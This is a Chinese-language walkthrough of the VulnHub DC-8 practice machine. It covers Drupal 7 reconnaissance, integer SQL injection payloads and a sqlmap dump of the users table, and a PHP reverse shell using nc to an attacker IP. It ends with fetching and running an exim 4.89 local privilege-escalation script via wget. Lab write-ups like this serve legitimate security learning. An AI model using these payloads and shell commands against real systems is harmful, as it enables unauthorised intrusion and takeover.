写在前面
靶场链接:
https://www.vulnhub.com/entry/dc-8,367/
DC系列,有些知识点在DC:1中提到,可以翻阅
DC:1
信息搜集
首先进行存活扫描
这里就直接展示端口扫描了,显然有80和22
进入80看看
直接指纹识别,是drupal7 版本
简单尝试和探测
试下之前drupal的经典漏洞,不太行
如果你想了解这个漏洞的详情,这里推荐一篇好文:https://xz.aliyun.com/t/2271
路径扫描,很容易找到robots.txt
显然暴露了登录url
进去看看,并没有什么线索,可以爆破,暂时先放一边
SQL布尔盲注
随意点击一下,有一个参数跟随变化,这是sql注入的标志
测试一下,真的报错了,同时泄露敏感信息,暴露出sql语句
明显是一个整型sql注入,丢一些简单的语句进行测试
nid=1 or 1=1
nid=1 order by 1
上述都成功了,判断为整型注入,列数为1,继续探测
1 union select 2333
这个结果表示无回显,继续进行盲注测试
-1 union select length(database())>2
-1 union select length(database())>10
这里差异非常明显了,使用0和1来做盲注的区别,非常良心,在真实情况下几乎不可能遇见就是了
可以写脚本,sqlmap也可以,这种盲注差异标志比较明显的,sqlmap非常方便
判断成功
一路探测,到最后的用户数据和密码
sqlmap -u http://192.168.101.31/?nid=1 -D d7db -T users -C name --dump
这个形式明显可以跑一下john
跑出来一个密码,应该是作者设计好的
后台RCE
进入后台,开始找后台RCE,一般后台就是模板文件,编辑器,文件上传点。一顿翻找后,在表单设置这里看到可选php代码
这个设置可以更改提交后返回的数据
那么,在这个页面上马,同时访问这个提交完成的界面即可
一句话木马我暂时没连成功,可以使用msf中的后门
如果你觉得麻烦,可以用下面这个命令反弹
<?php
system("nc 192.168.101.115 -c /bin/bash");
?>
这里演示就直接反弹出来,比较简单直观
suid提权
同样的思路,查找suid文件
比较奇特的有一个exim4程序,msf搜索后有这个命令的漏洞
Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件。该软件主要运行于类UNIX系统。通常该软件会与Dovecot或Courier等软件搭配使用。Exim同时也是“进出口”(Export-Import)的英文缩写。
先确定版本,为4.89
查找一下poc,有一个本地提权的sh文件
拷贝出来,准备上传文件,这里利用的方式的远程获取的方式,在有目标的一定权限情况下,可以尝试主动连接获取。
使用python开启server
python3 -m http.server 2333
这个命令,可以快速在当前文件夹下开启http服务,指定端口即可
注意在tmp文件夹下进行,有权限,使用wget命令进行获取
wget 192.168.101.115:2333/exim_hack.sh
注意这个脚本有两个payload选择,使用-h查看,直接执行可能不成功哦,最好指定一下
./exim_hack.sh -m netcat
注意它权限时间只有一段时间,不太稳定,可以多试几次
提权成功,查看flag
682
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
